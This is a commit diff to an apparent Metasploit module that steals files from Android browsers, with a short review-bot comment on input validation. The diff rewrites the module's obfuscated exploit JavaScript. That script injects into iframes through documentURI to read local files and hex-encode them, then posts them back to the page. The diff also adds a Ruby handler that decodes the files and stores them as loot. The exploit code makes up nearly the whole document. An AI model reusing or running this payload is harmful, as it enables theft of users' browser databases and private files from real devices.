
Commit c4b8560

committed
Fix encoding, oops.
1 parent d486d17 commit c4b8560

1 file changed

+13
-4
lines changed

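--- a/modules/auxiliary/gather/android_browser_file_theft.rb
+++ b/modules/auxiliary/gather/android_browser_file_theft.rb
@@ -64,13 +64,14 @@ def on_request_uri(cli, request)
 
 def process_post(cli, request)
 data = JSON.parse(request.body)
+contents = hex2bin(data['data'])
 file = File.basename(data['url'])
-print_good "File received: #{request.body.length.to_f/1024}kb #{file}"
+print_good "File received: #{(contents.bytesize.to_f/1000).round(2)}kb #{file}"
 loot_path = store_loot(
 file,
 'application/x-sqlite3',
 cli.peerhost,
-data,
+contents,
 File.basename(data['url']),
 "#{cli.peerhost.ljust(16)} Android browser file"
 )
@@ -125,8 +126,11 @@ def exploit_js
 'var t=function(){setTimeout(function(){next(urls.shift());},1)};window.onmessage=t;'+
 'var next=(function(url){if(!url)return;try{var f = document.createElement("iframe");f.src=url;f.onload=f'+
 'unction(){f.onload=null;document.documentURI="javascript://hostname.com/%250D%250Ax=new '+
-'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.send();x.onload=fun'+
-'ction(){ top.postMessage({data:x.responseText,url:location.href}, String.fromCharCode(42));'+
+'XMLHttpRequest;x.open(String.fromCharCode(71,69,84),location.href);x.responseType=String.fromCharCode(97,'+
+'114,114,97,121,98,117,102,102,101,114);x.send();x.onload=function(){window.onerror=alert;'+
+'var buff = new Uint8Array(x.response);var hex = Array.prototype.map.call(buff, function(d)'+
+'{var c = d.toString(16);return (c.length < 2) ? 0+c : c;}).join(new String); top.postMessa'+
+'ge({data:hex,url:location.href}, String.fromCharCode(42));'+
 'parent.postMessage(1,String.fromCharCode(42));};x.onerror=function(){parent.postMessage(1,S'+
 'tring.fromCharCode(42))};";f.contentWindow.location = "";};document.body.appendChild(f);}catch(e){t();}});t();';
 brokenFrame.contentWindow.location = "";
@@ -136,4 +140,9 @@ def exploit_js
 |
 end
 
+# TODO: Make this a proper Rex::Text function
+def hex2bin(hex)
+hex.chars.each_slice(2).map(&:join).map { |c| c.to_i(16) }.map(&:chr).join
+end
+
 end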
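Review bot: `hex2bin` (new lines 144-146) decodes whatever the POST body supplies without checking it: `to_i(16)` turns any non-hex pair into a zero byte, an odd-length string leaves a lone digit that is decoded as a byte of its own, and a missing `data` key makes `hex.chars` raise `NoMethodError` inside `process_post`. Because the decoded value goes straight to `store_loot`, a malformed or hostile client can make the module record corrupted content under a trusted-looking loot entry. Reject bad input before decoding, e.g. `return nil unless hex.is_a?(String) && hex =~ /\A(?:\h\h)*\z/`, and have `process_post` skip the `store_loot` call when that returns nil. The conversion itself can be `[hex].pack('H*')`, the standard-library form, which returns a binary string. `process_post` continues past the end of the first hunk, so how `loot_path` is used afterwards is not visible here.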
